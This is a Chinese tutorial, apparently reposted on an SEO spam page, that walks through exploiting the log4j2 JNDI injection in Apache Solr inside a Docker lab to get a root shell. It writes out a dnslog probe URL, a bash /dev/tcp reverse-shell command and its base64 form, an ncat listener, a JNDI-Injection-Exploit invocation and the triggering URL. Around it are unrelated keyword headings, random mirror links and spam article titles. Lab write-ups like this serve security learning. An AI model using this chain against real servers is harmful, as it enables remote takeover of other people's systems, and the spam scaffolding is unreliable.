当前位置: 首页 > wzjs >正文

如何建设成为营销网站计算机网络专业主要学什么

如何建设成为营销网站,计算机网络专业主要学什么,国内购物平台,wordpress扫码付费在Apache Solr 中复现log4j2的jndi注入漏洞,获得docker容器的root权限,实验五步走: 启动容器访问web页面漏洞探测反弹shell载荷wireshark抓取log4j反弹shell流量 ailx10 1956 次咨询 4.9 网络安全优秀回答者 互联网行业 安全攻防员 去咨…

在Apache Solr 中复现log4j2的jndi注入漏洞,获得docker容器的root权限,实验五步走:

  1. 启动容器
  2. 访问web页面
  3. 漏洞探测
  4. 反弹shell载荷
  5. wireshark抓取log4j反弹shell流量

ailx10

1956 次咨询

4.9

网络安全优秀回答者

互联网行业 安全攻防员

去咨询

一、启动容器

二、访问web页面

IP地址192.168.0.105是我的ubuntu18.04虚拟机,这里作为靶机

三、漏洞探测

IP地址192.168.0.105是我的ubuntu18.04虚拟机,这里作为靶机

http://192.168.0.105:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.ueg2ky.dnslog.cn} 

四、反弹shell载荷

IP地址192.168.0.104 是我的mac电脑

bash -i >& /dev/tcp/192.168.0.104/6666 0>&1

对上面的命令进行bash64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA0LzY2NjYgMD4mMQ==

先在mac上进行监听

ncat -l 6666

在mac上运行漏洞利用命令[1]

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA0LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.0.104

用上面的命令结果访问靶机

http://192.168.0.105:8983/solr/admin/cores?action=${jndi:ldap://192.168.0.104:1389/9gozs8}

在mac上成功接收到靶机反弹的shell

五、wireshark抓取log4j反弹shell流量

我们可以清楚的看到攻击者访问了靶机有漏洞的页面

紧接着看到靶机主动访问了攻击者的IP地址,攻击者给靶机响应了200 OK状态码

反弹shell后,我们敲击一个ls,获得流量如下,都是TCP连接

请求流量

响应流量

参考

  1. ^JNDI-Injection-Exploit Releases · welk1n/JNDI-Injection-Exploit · GitHub

文章转载自:

http://q6qyzxsm.xrwtk.cn
http://xf5DPiJj.xrwtk.cn
http://GJojPUs7.xrwtk.cn
http://C9OvYCoI.xrwtk.cn
http://PjaDRLud.xrwtk.cn
http://G0QQjc2E.xrwtk.cn
http://jsqTc9I0.xrwtk.cn
http://aYkpKFQx.xrwtk.cn
http://hSuSgXyG.xrwtk.cn
http://ZNrRbu9d.xrwtk.cn
http://7N2QkyDD.xrwtk.cn
http://0YVM4gTx.xrwtk.cn
http://8W0QkPjk.xrwtk.cn
http://kXQCBPtb.xrwtk.cn
http://ymwsmBol.xrwtk.cn
http://2zBXbmTt.xrwtk.cn
http://W0JJcpYj.xrwtk.cn
http://E2bJZ4ZL.xrwtk.cn
http://JS37L0lN.xrwtk.cn
http://vyaZycUc.xrwtk.cn
http://VoF4ipWN.xrwtk.cn
http://g4c0s3vr.xrwtk.cn
http://iEbu7mmF.xrwtk.cn
http://Ml3prD0c.xrwtk.cn
http://kbYKKBR4.xrwtk.cn
http://PsAYR7ie.xrwtk.cn
http://9C9S9CnL.xrwtk.cn
http://aV1ZJzyn.xrwtk.cn
http://aGfsLplM.xrwtk.cn
http://SJJUnhIK.xrwtk.cn
http://www.dtcms.com/wzjs/729590.html

相关文章:

  • cms网站网络地址图片好看的网页源码
  • 免费做淘客cms网站视频推广渠道
  • 京东网站建设案例一级造价工程师教材
  • 简历网站后怎样才能被谷歌 百度收录吗建筑工程网布设
  • 网站搭建备案吗VPS如何做镜像网站
  • 网站开发外包东莞企业网站排名优化
  • 如何做网站计数器wordpress个人博客主题
  • html做网站例子网站后台网址后缀
  • jquery 个人网站做企业网站模板可以seo
  • 网页制作与网站建设实战大全 豆瓣如何自己做自己的网站
  • 离职同事以公司名义做网站做自媒体一般都注册几个网站
  • 自己创网站php怎么做网站快
  • 重庆 手机网站制作网络运维主要做什么
  • 网站设计工具在手机上创建网站
  • 网站用图怎么做文件小质量高ios网页游戏
  • 还有河北城乡和住房建设厅网站吗群晖打开wordpress4.9.8
  • 做儿童业态招商要去哪些网站互联网广告行业前景
  • 黄埔做网站长春网络推广公司哪个好
  • 网站建设推广服务合同开做网站的公司 条件
  • 西安网站注册网络公司网络推广服务
  • 网站建设标新立异seo的搜索排名影响因素有哪些
  • 外包网站建设公司手机 网站 源码
  • 做景区网站建设的公司长三角旅游推广联盟
  • 创建众筹网站伴奏网站防盗是怎么做的
  • 工业部网站备案河南网站制作
  • 创新的微商城网站建设浙江省建设厅网站高工
  • 杭州建设网站公司wordpress怎么加404
  • 扬州市住房和建设局网站中山专业做网站
  • 域名怎么创建网站吗本地岑溪网站开发
  • 网站 功能呢design工业设计